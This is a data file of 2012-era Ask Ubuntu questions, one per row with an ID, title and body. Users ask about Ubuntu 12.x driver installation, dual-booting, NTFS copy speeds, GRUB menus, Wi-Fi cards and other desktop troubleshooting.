update-initramfs : generating /boot/initrd.img-3.7.0-7-generic selecting previously unselected package nvidia-experimental-310 . ( reading database ... 220868 files and directories currently installed . ) unpacking nvidia-experimental-310 ( from ... /nvidia-experimental-310_310.14-0ubuntu1_i386.deb ) ... processing triggers for desktop-file-utils ... processing triggers for man-db ... setting up nvidia-experimental-310 ( 310.14-0ubuntu1 ) ... update-alternatives : using /usr/lib/nvidia-experimental-310/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : skip creation of /usr/lib32/libopencl.so because associated file /usr/lib32/nvidia-experimental-310/libopencl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/vdpau/libvdpau_nvidia.so.1 because associated file /usr/lib32/nvidia-experimental-310/vdpau/libvdpau_nvidia.so.1 ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/libvdpau_nvidia.so because associated file /usr/lib32/nvidia-experimental-310/vdpau/libvdpau_nvidia.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : using /usr/lib/nvidia-experimental-310/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) info : enable nvidia-experimental-310 debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude loading new nvidia-experimental-310-310.14 dkms files ... building only for 3.7.0-7-generic building for architecture i686 building initial module for 3.7.0-7-generic traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms_packages.py '' , line 22 , in < module > import apport importerror : no module named apport error ! bad return status for module build on kernel : 3.7.0-7-generic ( i686 ) consult /var/lib/dkms/nvidia-experimental-310/310.14/build/make.log for more information . processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.7.0-7-generic so there 's some `` apport '' error going on , whatever that means . here 's the make file log : http : //paste.ubuntu.com/1464536/ question : how do i solve this ? additional info : xubuntu 12.10 nvidia geforce gt430 if more info is needed , just let me know . update : i removed the xorg-edgers ppa , and uninstalled all the 3.7 kernel things using synaptic . then i ran apt-get autoremove to remove any leftovers , apt-get update , and the apt-get install nvidia-current-updates , which still did n't work . looking at the log from terminal , it seems that i do n't have the source of the kernel or something .
232629	generic flash downloader	there are several content downloaders like you_tube_downloader and many others . however i do n't wnat something which is specific to one site or another . is there something like real_player_for_windows which is capable of downoading_any flash content which it comes across any_website on the internet . i need something generic and which holds true for every website not just one or two
232640	how to speed up copying files to ntfs drive ?	i recently bought new usb 3.0 flash drive ( write speed : 110 mb/s , read speed : 190 mb/s ) . and i have dell xps 13 ( it has ssd and usb 3.0 ) . my problem is speed of copying files to the usb flash stick . when i formatted it to fat32 or ext2 , ext3 , ext4 , the speed was around 100 mb/s . but with ntfs it 's only around 20-30 mb/s . but i do n't think the problem is writing data to the usb stick . it seems the problem is reading from ssd when i 'm copying files to the ntfs drive . because when i look to the indicator-multiload , the read speed is around 30 mb/s , but the write is around 100 mb/s ( see the graph : http : //ubuntuone.com/3zhzuffr9qgjev62qpq6va ) . another proof is simple program that i wrote in java , which only read data from ssd and write them to usb stick . the speed with this program was also around 100 mb/s . does anybody know , how to improve native copying ( cp command ) to get the full speed with ntfs drive ? thank you very much ! ps : i 'm new ubuntu user . edit : i test it now with 3.9 gb file : ctrl+c/ctrl+v in nautilus : 1:58 ( 34 mb/s ) command `` cp '' : 1:39 ( 40 mb/s ) java program : 0:44 ( 90 mb/s ) edit 2 : if anyone wants to try it . here is the program ( for java 7 ) , that i used ( source + compiled ) : http : //ubuntuone.com/0kqganrgn17izzm5fdpayj to test it , just cd to the bin folder and run : java ntfscopy source destination or run : java ntfscopy to see the usage . notice : please notice that this program has not been tested , so use it at your own risk . to check if the file was copied correctly , use md5sum or sha1sum or something similar .
232645	how to install canon lbp2900 printer in ubuntu 12.10	sir.. i have recently upgraded to ubuntu 12.10 . i recently bought canon lbp2900 printer . unfortunately i tried to install it ..there is no use . please tell me how to install it and work with it .
232647	java not allowing for the use of all 8gb of ram	i have a 32bit version of ubuntu server with pae active allow for the full use of the 8gb of ram but i ca n't use more than 2gb of ram in java . i run the command java -xms6g -xmx7g -jar server.jar and i get the error : invalid initial heap size : -xms6g the specified size exceeds the maximum representable size . could not create the java virtual machine . do i need to change something with java ? the server is 32bit so pae is active to allow for the server to use all the 8gb of ram .
232648	how to dual-boot ubuntu and windows 8	i have a pc with windows 8 on it , but i would like to install ubuntu on it . i have created a usb drive with ubuntu on it using pendrive linux 's usb creator as it was recommended by one of the guides on ubuntu.com . it 's the 64-bit version of ubuntu 12.10 . the question now is how do i dual-boot it . the pc came pre-installed with windows 8 on it , so there is no normal bios order that i can configure or change . how to i do it ? please help me and explain in an easy to understand way , i am a complete newbie when it comes to computers ! ! !
232649	how to show a hidden file	i wanted to add classpath to my jdk . while searching a way to do it i notice everyone open .profile file using terminal . but when i want to open and edit it with a text editor i could n't see that file in home folder . can someone tell me why is this . and also if possible how can i access .profile in home folder the gui way
232655	can a virus spread through dosbox in ubuntu ?	i have a virus in several dosbox msdos games . it does n't seem to be affecting the ubuntu files , but is spreading amongst my dosfiles that were opened in dosbox . i do n't know how to control this in the dosbox emulator , but clamav found them on a routine scan of my /home folder . any suggestions ?
232656	howto change keyboard layout for startup ( passphrase prompt )	how do i permanently change the keyboard layout for the passphrase prompt at startup ?
232659	viewing files other than ones located in ubuntu partition	i recently started trying using ubuntu 12.10 desktop from a usb stick . is there any way that i could view and use my files in other partition , which i now only do while booting in with windows 7 ultimate ( 32 bit ) version ?
232669	is there anything to remember when i exchange my / ?	i have a laptop computer with the following setup : / on a btrfs /dev/sda3 subvolume @ /home on a btrfs /dev/sda3 subvolume @ home /boot on an ext4 /dev/sda2 /boot/efi on a vfat /dev/sda1 no swap /tmp on a tmpfs now i got a new solid state disk that i want to use instead of my current setup . besides dd'ing the whole disk to the ssd ( which i do n't want to do since it marks all sectors as used ) , what steps should i do to copy all data in a way that my system still boots afterwards ? big gotcha : i ca n't insert both discs at once into my system but i have a sufficiently fast esata backup disc that is big enough to store all data from the old hdd .
232670	how to connect to internet using reliance netconnect data card ?	i have a reliance netconnect data card . i have plugged the datacard to my pc but it does n't autorun or asks for installation as it does on windows . without it being installed i can not connect to the internet . i am using ubuntu 12.10 32-bit in case it matters . how to connect to internet using reliance netconnect data card ?
232671	can i have more than one desktop installed and then choose which one to use ?	my friend just told me , that i could have more than one desktops in ubuntu and then choose which one to use when the ubuntu starts up and goes to login screen . i have ubuntu 12.10 and i think my default desktop is unity , so can i have gnome desktop and more desktops ? and if so , how and where to install them and how to use them ?
232672	installing ubuntu from usb stick and help in partitioning	i 'm a very new ubuntu user , i tried using ubuntu 12.10 desktop form a usb stick and found it interesting . i wanted to install it along with my windows 7 ultimate 32-bit . i have 290.3 gb hard disk which is split into 3 partitions . they are 200 gb , 50 gb and 40 gb in size . the 200 gb partition has my windows files and the 50 gb partition is totally empty . so i thought i 'd use the 50 gb partition for ubuntu . is that 50 gb one big enough ? is it too big ? which partition should i use ? and how do i partition it ?
232674	ubuntu root sound problem	hello i just installed ubuntu 12.10 and made a new root account the problem is that in the normal user the audio works fine but when i log in as root the audio does n't work ( muted and i ca n't change it ) . can anyone help me ?
232675	change keyboard shorcuts ? alsamixer	i use `` master mono '' for my audio . i like using the volume up and volume down buttons on my keyboard but they only change `` master '' not `` master mono '' . anyway to change this ?
232676	ubuntu tweak menus in chinese please help	i installed ubuntu tweak and the menus are partly romanian ( native and system language ) and partly chinese ( totally foreign to me ) . i searched the web , no answer for this problem . i would very much like to know how i can install this app with complete romanian or at least english menus - no chinese ! ! thank you ! ! ( ubuntu quantal / simple gnome environment / ubuntu tweak 0.8.3 )
232677	are there tools to measure video quality ?	i am looking for any tools that can measure the video quality in a subjective way ( as how the eye sees a moving picture ) . are there any tools to which i could input a video file and get a subjective reading of how the quality of the video is ? here is information thanks to snow about how to measure video quality note that the script there does not work and the other alternative is a windows app .
232678	how do i copy mysql databases to another ubuntu machine ?	i installed a lamp server on my pc and created databases . now i want to copy it to my friend 's computer . how can i do this ?
232681	grub not showing windows 7 after ubuntu 12.04 install	i installed ubutnu 12.04 last night , go to boot into windows and grub only shows the option to boot into ubuntu . most of last night and most of this morning i have been doing research and trying different things to attempt to get win 7 back . boot info : http : //paste.ubuntu.com/1464962/
232683	ubuntu install removed bios option	two days ago i installed ubuntu 12.10 from a livecd . for some reason , the installation changed or deleted the option to enter the bios screen , and also changed the boot options so the only os the you can enter is ubuntu ( this was supposed to be a dual-boot laptop ) . i did n't know that ubuntu removed the option to enter the bios menu so i thought that if i uninstall ubuntu , and enter my windows 7 cd to my cd-rom and use mbr repair it will work . but ubuntu changed the boot options so even when i am removing the hard drive , i still ca n't access bios or boot from usb/cd can anyone please help me ? i cant access my bios or boot from anything . when i turn my laptop on it goes right to boot option screen and the 2 options are windows boot loader and ubuntu . when i click on one of them nothing happens . thank you ! hardware info : fujitsu lifebook a series 8gb ram intel core i5 3210m phoneix bios [ f2 - enter bios setup ]
232687	how do i install backtrack applications in ubuntu ?	i was just trying to download and install backtrack application but in it 's offical site it had the options only for gnome and kde , but not unity , does it mean backtrack wo n't work on unity ? or if i can install it on unity , how can i do it after i download it 's package from the official website ? i am going to download : backtrack 5 r3 gnome 32bit
232691	can not open shared object file : no such file or directory	problem with this file /tmp-air-nkhvxz-setup-error-while-loading-shared-libraries-libgtk-x11-2-0-so-0 i try to solve this problem and try to install libgtk-x11-2.0.so.0 sudo apt-get install libgtk2.0-0 : i386 sudo apt-get install ia32-libs but two links above do not work . is there any other alternative one ?
232695	can i use stock kernel with xorg edgers ppa ?	good evening everyone , my question , basically , is in the title . i am running ubuntu 12.10 64 bit with intel+nvidia card bumblebee installed . reason for this question is , i noticed , that on stock kernel my battery life is a lot higher than in kernel ( which is 3.7 in xorg edgers ppa ) . but in the ppa it is listed that this ppa is currently meant to be used as a whole . please do not individually install packages from it , add it to your sources and let your package manager pull in every update . so my question is can i use stick 3.5 kernel with this ppa enabled and all updates installed from it or i should use kernel from this ppa ? thank you : )
232698	laptop shuts down when press install now on installation of ubuntu	i 'm trying to install ubuntu 12.04 on my laptop along with windows ( 32-bit , off a bootable usb ) . when i click `` continue '' to install alongside of 7 , the laptop shuts down and then boots back into windows ! i do n't want to replace 7 , just dual-boot . i tried f : \wubi.exe -- force-wubi ( my usb drive is f : ) and it is downloading an iso file from a torrent now . update : using -- force-wubi managed to install 12.04 and updated to 12.10 all running well and fine
232699	nvidia gt630m and intel hd 4000 issues	i have a lenovo z580 ( 12.10 quantal ) . it has both an intel hd 4000 and an nvidia gt 630m ( cuda and optimus ) . when using ubuntu , my laptop battery runs out much quicker than on windows and the laptop also heats up more than on windows . is that because ubuntu is using the nvidia card all the time ? i do n't have any driver installed for the card . i tried apt-get install nvidia-current to get the proper driver but it caused many problems . ( resolution stuck on 640 x 480 , taskbar and launcher not appearing , only background shows , i used ctrl + alt +t to open a terminal and remove nvidia current ) do i need to install proper drivers ( or bumblebee ) ? will it help my battery life ?
232700	motherboards for new ubuntu install	i will be installing kubuntu on 4 computers for a small business network . due to previous problems with ubuntu on recent motherboards , i would like to know which of the following motherboards can be reasonably expected to work out of the box with kubuntu 12.04 lts or kubuntu 12.10 . these are the only motherboards in our price range from the supplier , unfortunately : asus p8h61-m lx r2.0 asus p8h61-m le r2.0 asus p8h61-i r2.0 gigabyte ga-h61m-d2h gigabyte ga-h77m-d3h it seems that the ubuntu hardware compatibility list website is no longer maintained , and i can not find any official information about these motherboards on linux in general or ubuntu in particular .
232701	update manager problem	i 'm new to ubuntu and using 12.04 lts . there 's something wrong with the update manager . every time it launches , the error : e : type 'chpad.net/cooperjona/stormcloud/ubuntu ' is not known on line 2 in source list /etc/apt/sources.list.d/cooperjona-stormcloud-precise.list pops up . what do i do ?
232703	did replacing windows with ubuntu completely remove windows ?	i booted from the ubuntu iso which i burned on a disk and installed ubuntu , and chose the option to replace windows 7 with ubuntu , now the version of windows 7 i was running was an illegal cracked version and i already had tried to get rid of it without booting into the actual os and after many attempts was unsuccessful . now did installing ubuntu and choosing the option of replacing windows 7 actually solve my problem and did it wipe the previous windows os every little part of it .
232704	how to find drivers and tools for eeepc f201e	i got a f201e with ubuntu 12.04 lts preinstalled . i installed 12.10 but i ca n't get the ethernet and some of the function keys to work ( e.g . adjust screen brightness ) the asus website does not provide any drivers for ubuntu . where/how could i find those ?
232707	icon name for unlocked keyring	i am working on a program and i want to implement icon denoting keyring state . if you start seahorse you 'll see it has the same icon of padlock in two states , locked and unlocked . i am unable to find unlocked icon name . there are many locked padlocks in /usr/share/icons but i did n't find any unlocked icons . so , my question is , what 's the name of the icon i can use with set_from_icon_name method . note : stock_lock-open is not the one am looking for .
232708	how to update synaptic on 10.10 to include new packages	i would really appreciate if someone can help me out . i 've been using gtk3 on 10.10 to write applications but when i start them it says gtk-message : failed to load module `` canberra-gtk-module '' i have libcanberra0 installed from synaptic , but i guess it is asking for libcanberra3 so i tried installing the deb package from the online repository it says it depends on libcanberra-gtk3-0 which depends on multiacrch support which depends on libc6 . none of these are available in synamptic , last time i tried installing an newer version of libc6 my whole system got messed up with unmet dependencies so i do not want to go that route again . i was wondering if there is any way to update synaptic so it will include libcanberra3 so i do n't have to deal with all of these dependencies ? thank you , p.s . i do n't want to update to 11 or 12 since my system is lagging so much , and i would like to stick with 10.10 .
232711	intel 82574l and 82579lm does not work	i have a supermirco 9xscm-f mainboard in my esx server . it has two intel network cards . i would like to setup ubuntu 12.10 64 with 82579lm in passthrough mode . that means this nic does not use the esx interface for paket forwarding . i have done the follwing troubleshooting but i am not able to get this device connected . root @ gns3lab-virtual-machine : ~ # lspci -m | grep 03:00.0 03:00.0 `` ethernet controller '' `` intel corporation '' `` 82579lm gigabit network connection '' -r05 `` super micro computer inc '' `` device 1502 '' root @ gns3lab-virtual-machine : ~ # lspci -n | grep 03:00.0 03:00.0 0200 : 8086:1502 ( rev 05 ) root @ gns3lab-virtual-machine : ~ # cd /7 bash : cd : /7 : datei oder verzeichnis nicht gefunden root @ gns3lab-virtual-machine : ~ # cd // root @ gns3lab-virtual-machine : // # cat lib/ cat : lib/ : ist ein verzeichnis root @ gns3lab-virtual-machine : // # cat lib lib/ lib64/ root @ gns3lab-virtual-machine : // # cat lib lib/ lib64/ root @ gns3lab-virtual-machine : // # cat lib/modules/3.5.0- 3.5.0-17-generic/ 3.5.0-21-generic/ root @ gns3lab-virtual-machine : // # cat lib/modules/3.5.0-21-generic/modules.pcimap | grep 8086 | grep 1502 e1000e 0x00008086 0x00001502 0xffffffff 0xffffffff 0x00000000 0x00000000 0x0 root @ gns3lab-virtual-machine : // # lsmod | grep e1000e e1000e 199114 0 root @ gns3lab-virtual-machine : // # ifconfig eth0 link encap : ethernet hardware adresse 00:0c:29 : d5 : cd : b9 up broadcast multicast mtu:1500 metrik:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenl채nge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 g체ltigkeitsbereich : maschine up loopback running mtu:16436 metrik:1 rx packets:336 errors:0 dropped:0 overruns:0 frame:0 tx packets:336 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenl채nge:0 rx-bytes:27424 ( 27.4 kb ) tx-bytes:27424 ( 27.4 kb ) root @ gns3lab-virtual-machine : // # eth0 link encap : ethernet hardware adresse 00:0c:29 : d5 : cd : b9 this device is the esx adapter not my nic . my nic should appear as the second ( eth1 ) please help me , i found serveral dell laptops wich are ubuntu certified . i think this nic must work . regards , sebastian
232716	help : can not install a gz package on ubuntu 12.10 64-bit	i am a new ubuntu user . i 'm trying to install a package in a file called vnc-viewer-5.0.3-linux-x86.gz . i keep having problems . the package is in my folder : /home/downloads/vnc-viewer-5.0.3-linux-x86.gz i tried : owner @ ubuntu : ~ $ cd ~/downloads owner @ ubuntu : ~/downloads $ sudo apt-get install vnc-viewer-5.0.3-linux-x86.gz [ sudo ] password for owner : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vnc-viewer-5.0.3-linux-x86.gz e : could n't find any package by regex 'vnc-viewer-5.0.3-linux-x86.gz' i also tried : owner @ ubuntu : ~/downloads $ ./configure bash : ./configure : no such file or directory i have followed sudo apt-get install build-essential checkinstall as explained on this wiki page and i am still quite lost in how to install this gz package . this package is needed to remotely control my school computer . my kernel is linux-3.5.0-21 generic ( x86-64 ) distribution ubuntu 12.10 gnu c compiler version 4.7.2
232717	how do i mount disks with an adaptec raid controller on a dual-boot machine ? ( error code 12 )	i 'm trying to migrate from windows to ubuntu 12.04 , dual-booting at the moment . one problem i am facing is the raid controller , i 'm not able to mount any of the drives connected to it . ( the os is up and running , installed on a separate hd not connected to the raid controller . ) the raid controller is an adaptec 5805 with a couple of hd , some of them are gpt ( > 2tb ) . i have installed the adaptec storage manager and i can view the all the hd and the raid set-up . looks like the adaptec storage manager works fine from what i can tell . the disks are visible in nautilus with correct name . when i try to mount any i get the error code 12 ? error mounting : mount exited with exit code 12 : failed to read last sector ( 1953520001 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdc1 ' : invalid argument the device '/dev/sdc1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? i have not installed the driver from adaptec as i supposed that 's included in 12.04 , correct or incorrect ? any one else that already gone through this process or have any tips ?
232720	using the dd command on external hard drive with partitions	i want to write a .raw file to the first partition of my external drive . i tried : dd if=file of=/dev/sdb3 but it did n't give me a bootable drive since the correct command should had been : dd if=file of=/dev/sdb . my question is would this command destroy data on the other two partitions that i have on the drive , or only on the first partition ?
232721	unable to install ubuntu	i 'm unable to install ubuntu using windows installer . i get the following error message . http : //i.stack.imgur.com/jcoqp.jpg
232729	why do grub.cfg and actual boot options differ ?	after a recent upgrade my boot options were changed . following instructions i found , i downloaded a tool called grub-cfg and used it to change my boot options . unfortunately , it did n't work . the options from my configuration in /boot/grub/grub.cfg and the boot options that are actually shown are different . here are my grub.cfg headers ( my full grub.cfg is here ) : menuentry `` ubuntu '' -- class ubuntu -- class gnu-linux -- class ... menuentry `` ubuntu , with linux 12.04 3.2.0-24-generic '' -- class ubuntu ... menuentry `` memory test ( memtest86+ ) '' menuentry `` memory test ( memtest86+ , serial console 115200 ) '' menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows ... menuentry `` windows recovery environment ( loader ) ( on /dev/sda3 ) '' -- ... the boot menu actually looks like : if i understand things right , the entries from the grep are exactly what i should be seeing on the boot screen , but they obviously are n't . i want the grub boot options to be what i set them to with grub config ; the default should take me to the 12.10 kernel instead of the 12.04 ( 2.6.38-16 generic ) kernel . what 's going on ? here is a bit more information . i was looking at /var/log/system.1 and found the following dec 26 14:23:20 hikari 40grub2 : skipping entry 'ubuntu , with linux 3.2.0-23-generic ( on /dev/sdb6 ) ' : dec 26 14:23:20 hikari 40grub2 : appears to be an automatic reference taken from another menu.lst ... dec 26 14:23:20 hikari 40grub2 : debug : parsing : # # # end /etc/grub.d/41_custom # # # what 's particularly interesting here is that on my system i have windows 7 , ubuntu 12.04 and ubuntu 12.10 . the grub.d/41_custom file lives on the 12.04 system not the 12.10 . so what happened is that after the last upgrade grub is reading 12.10 /boot/grub.cfg but parsing the /etc/grub.d from the 12.04 area . does anyone have suggestions where to look next ? how can this be ?
232730	ubuntu studio 12.0.4 & mozilla firefox input text glitch	i am experiencing a serious issue with the `` dark theme '' functionality in ubuntu studio 12.0.4 ( low latency ) & mozilla firefox 17.0.1 . the google search engine field input text is rendering `` light grey '' . it is in fact so faint that it is nearly undetectable to the naked eye without highlighting the input text . is there a way to force mozilla firefox to render standard colors ? how can i prevent the theme colors from rendering in the web browser ? there have been similar issues reported on previous versions of mozilla firefox . please view this entry below : http : //askubuntu.com/questions/183564/high-contrast-theme-firefox-prob here is a screenshot of the ubuntu theme on my desktop before the assumption is made that my applied firefox theme is causing the `` light grey text '' you see . you may view this below : the `` light grey text form field issue '' has been present way before i added my mozilla firefox 17.0.1 theme . whensoever i choose the default `` ubuntu 12.0.4 '' theme the `` light grey text '' issue disappears as the input text becomes black . i 've done a complete uninstall of mozilla firefox 17.0.1 in an attempt to remedy this issue utilizing the `` synaptic package manager '' . i was also sure to purge any remnant mozilla firefox files ( customizations etc. ) . as an added step i 've also been sure to review any mozilla firefox settings that may be causing this issue . this is just one more screenshot so that you can see the `` use system colors '' check box under firefox preferences is unticked : i 've researched this all to no avail . please keep in mind that i am a ubuntu novice that requires a detailed explanation as i am migrating from mac osx & windows 7 . i am diligently seeking a fix for this as i do n't wish to change my theme just to have mozilla firefox function properly . this issue has been reported to bugzilla @ mozilla for further troubleshooting and observation and i have received a response . you may view that bug report here : bugzilla bug submission i will provide further updates in the comments section as warranted regarding mozilla 's response .
232731	how to make a bit copy of my internal hd to an extneral hd ?	this question stemed from my other question : how do i make a bit copy of my internal hard drive to an external hard drive and check the disk for errors ?
232735	wifi does not work on dell inspiron n5520	купил сегодня ноут dell inspiron n5520 на нем стояла ubuntu 11.10 я решил поставить по свежее версию 12.10 но перестал работать wi-fi translation : today i bought a new dell inspiron n5520 laptop , but it had 11.10 on it . i decided to update to version 12.10 , but the wi-fi stopped working .
232739	12.04 wireless internet missing firmware	i just installed ubuntu 12.04 on my compaq pesario v2000 , however , i am missing te appropriate firmware for wireless access . i am somewhat of a noob to ubuntu so semi-detail instructions would be appreciated .
232742	`` failed to create user '' due to regular expression error	i 'm running ubuntu 12.10 desktop 32 bit . currently i have only a user , type administrator . i 'd like to create another administrator user but i keep getting the following error : failed to create user gdbus.error : org.freedesktop.accounts.error.failed : running '/usr/sbin/adduser ' failed : /usr/sbin/adduser returned an error ( 1 ) : adduser : please enter a username matching the regular expression configured via the name_regex [ _system ] configuration variable . use the ` -- force-badname' option to relax this check or reconfigure name_regex . any suggestion is appreciated .
232749	using tp-link tl-wdn-4800	i am currently unable to run my newly obtained tp-link tl-wdn-4800 wireless card with ubuntu 12.10 and i 'm currently unable to get it working . i 've tried sudo modprobe ath9k , and that did n't change anything , so i added ath9k to the end of /etc/modules and that did n't work . i stubled upon this tread here and i treid the `` fix '' in post # 2 , but it did n't help . what can i do to get it working ?
232761	music app for large library over samba share	i am currently using smb4k to auto-mount my samba share ( a 2tb hard drive plugged into my router usb port ) . the music collection is only a few hundred gbs . i 've tried adding my music collection to a number of different apps , so far with no luck . i have tried : 1 ) clementine 2 ) exaile 3 ) spotify the issues with each are : 1 ) file loading never completes . even after waiting days . it approaches 90 % and then the percentage complete begins dropping . i have no idea why this is happening 2 ) exaile is just buggy . the files seem to eventually load ( well , i have only tried the albums starting with `` a '' ) but even with this small collection loaded i have interrupted music playback and frequent fading out of the app gui ( while it 'thinks ' ) 3 ) spotify just does n't seem to scan the mounted share at all . i ca n't get anywhere , which is a shame.. as it 's a great way to catalog your collection with the additional online resource in one searchable library . playback through audacious works fine when i drop in a folder from the mounted share . the playback seems relatively flawless and snappy . any ideas ?
232762	lenovo y500 ca n't set brightness	i 've installed ubuntu 12.10 on a lenovo y500 laptop ( 2012 ) , video card is nvidia 650m ( no integrated graphics ) , i 'm using driver 310.19 . the problem is that i ca n't adjust brightness at all . if i press the relevant media keys , the indicator in ubuntu works correctly but the brightness is not changed . so far i 've tried the following : editing xorg.conf in this way : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection adding the options acpi_osi=linux acpi_backlight=vendor to the grub boot options setting brightness from the terminal and using xbacklight . the values of /sys/class/backlight/acpi_video0/brightness can be changed as well but the brightness remains the same . do you have any other hints ? solution it is possible to enable the backlight by installing the nvidiabl module . first of all install git and dkms : $ sudo apt-get install git dkms download the code on your machine and compile the package : $ git clone https : //github.com/guillaumezin/nvidiabl.git $ cd nvidiabl $ sudo make dkms-install now the module should be installed . to activate the nvidiabl module you should issue the command : $ sudo modprobe nvidiabl now the directory /sys/class/backlight/nvidia_backlight/ should be present . in order to manually change the brightness you have to write in the brightness file : $ sudo su # echo 100 > /sys/class/backlight/nvidia_backligh/brightness you can substitute 100 with any value up to 127 . in my case not the complete range of backlight are supported . you can tune the brightness calibration by varying the min and max parameters ( you will still have to write values in brightness up to 127 ) : $ sudo modprobe -r nvidiabl $ sudo modprobe nvidiabl max=100000 min=10 you can load the module at startup by adding nvidiabl ( with or without max and min parameters ) to the file /etc/modules , but i still have n't figured out how to properly add hotkeys .
232763	ssh process not killed on remote machine when the remote system unexpectedly disconnects	i have a question to which i have n't been able to find an answer . i have two computers , both of which run ubuntu 12.04 . i keep one of my computers at home and use ssh to connect to it from the other ( `` remote '' ) computer . the remote computer is able to connect to the home computer without problems . the remote computer also has setaliveinterval set to 60 in /etc/ssh/ssh_config , so that the connection does n't die if i step away from the computer for a moment . occasionally , my internet connection on my remote computer gets interrupted . internet interruptions cause my ssh tunnel to close ( of course ) . when i restore internet connectivity and re-connect to the home computer using a new ssh tunnel , though , i can see using # ps ax that the old ssh connection process is still running . this is a problem because i use an encrypted home directory on the home computer , which does n't allow the files to be re-encrypted until that ( now-dead ) ssh connection is killed . is there a way to set sshd_config on the home computer so that it automatically detects when a connection has died , and terminates it ?
232764	is the ubuntu installer capable of resizing/moving existing ntfs partitions ?	i want to install ubuntu 12.04 lts x64 alongside with windows 7 . i already have 3 primary partitions taking the whole disk space . 100 mb system-reserved ( primary ) 180 gb system ( primary ) 285 gb data ( primary ) i want to resize the partitions so they look like this afterwards : 100 mb system-reserved ( primary ) 100 gb system ( primary ) 300 gb data ( primary ) 100 gb ubuntu ( extended ; contains boot , root , home and swap logical partitions ) is this possible ( and safe ) to prepare my hard drive like that during the installation process ? i know that you can resize partitions . but the built-in windows 7 disk management tool for example can not shrink my system partition ( c : ) to 100 gb , because it is not capable of moving files , which is necessary . thanks for your time .
232765	how can i get the authentification dialog programatically ?	instead of using gksudo in a bash script , i want to invoke the authenticate dialog ( as in screenshot ) instead . is it possible ? if yes , how ? thanks .
232768	how can i remove all the applets from a mate panel ?	i 'd like to know how can i remove all the applets from a given panel in mate ( in my case the bottom panel ) from the command-line . the panel should be left in a clean state , meaning no applets just the panel . pretty much the opposite of what i did here . i believe the answer i got here should have some clues of what to do , but then again i 'm not good at scripting . how would i go about doing it ? .
232771	skype-bin not installable -- 'held broken packages '	i 'm having trouble installing skype . i 'm having the same issues as detailed in this thread ; installing skype will not work - skype-bin not installable , and 'held broken packages' and i am having trouble with this part : '' sudo vi /etc/apt/preferences and insert the following lines : package : * pin : release a=quantal* pin-priority : 2012 enter : wq to write the file . pin-priority must be greater than 1000 . '' what exactly does `` enter : wq '' mean ? i 've tried this numerous times and nothing happens . when i tried to create the file again , it says it may already exist or to delete `` etc/apt/preferences.swp '' before continuing , but i tried to delete it and it says it ca n't find it . also , when i created the preferences file , it said 'e353 nothing in register ' ( it was highlighted in red ) . is this standard ? i could use some help if anybody knows anything . thanks .
232775	making a 12.10 bootable usb drive - usb-creator-gtk fails with a seg fault	i 'm trying to make a bootable installation usb drive . i 've tried usb-creator-gtk , and it starts working only to fail with a segmentation fault , leaving a non-bootable drive . i 've tried `` unetbootin '' , and it makes a bootable drive that can not even begin an installation successfully . ( i ca n't tell what it 's problem is , but the result is utterly unworkable ; the installation process just hangs . ) this seems like something that should be pretty simple , and pretty easy . what am i doing wrong ? my 12.10 installation from which i 'm trying to run usb-creator-gtk is up-to-date , and other than this it works fine . the usb stick is fine ( and i 've tried this with several different usb sticks with the same result ) .
232779	ubuntu 12.10 ntfs error splicing file : value too large for defined data type	when files are copied from windows 7/8 ntfs partition , it throws the following error on some files . `` error splicing file : value too large for defined data type '' these files are not random . the copy operation consistently fails on certain files . some of these files are jpg images with reasonable sizes . obviously there are no errors when copied to usb drive through windows 8 . searching by error description shows that mount options can be modified to prevent such errors . but this is not a cifs share . it is the partition on the same hard drive where ubuntu is installed . the files are not corrupted as they can be opened with image viewer . any help would be appreciated . i dual boot windows 8 pro with ubuntu 12.10 . i am trying to backup windows files using ubuntu .
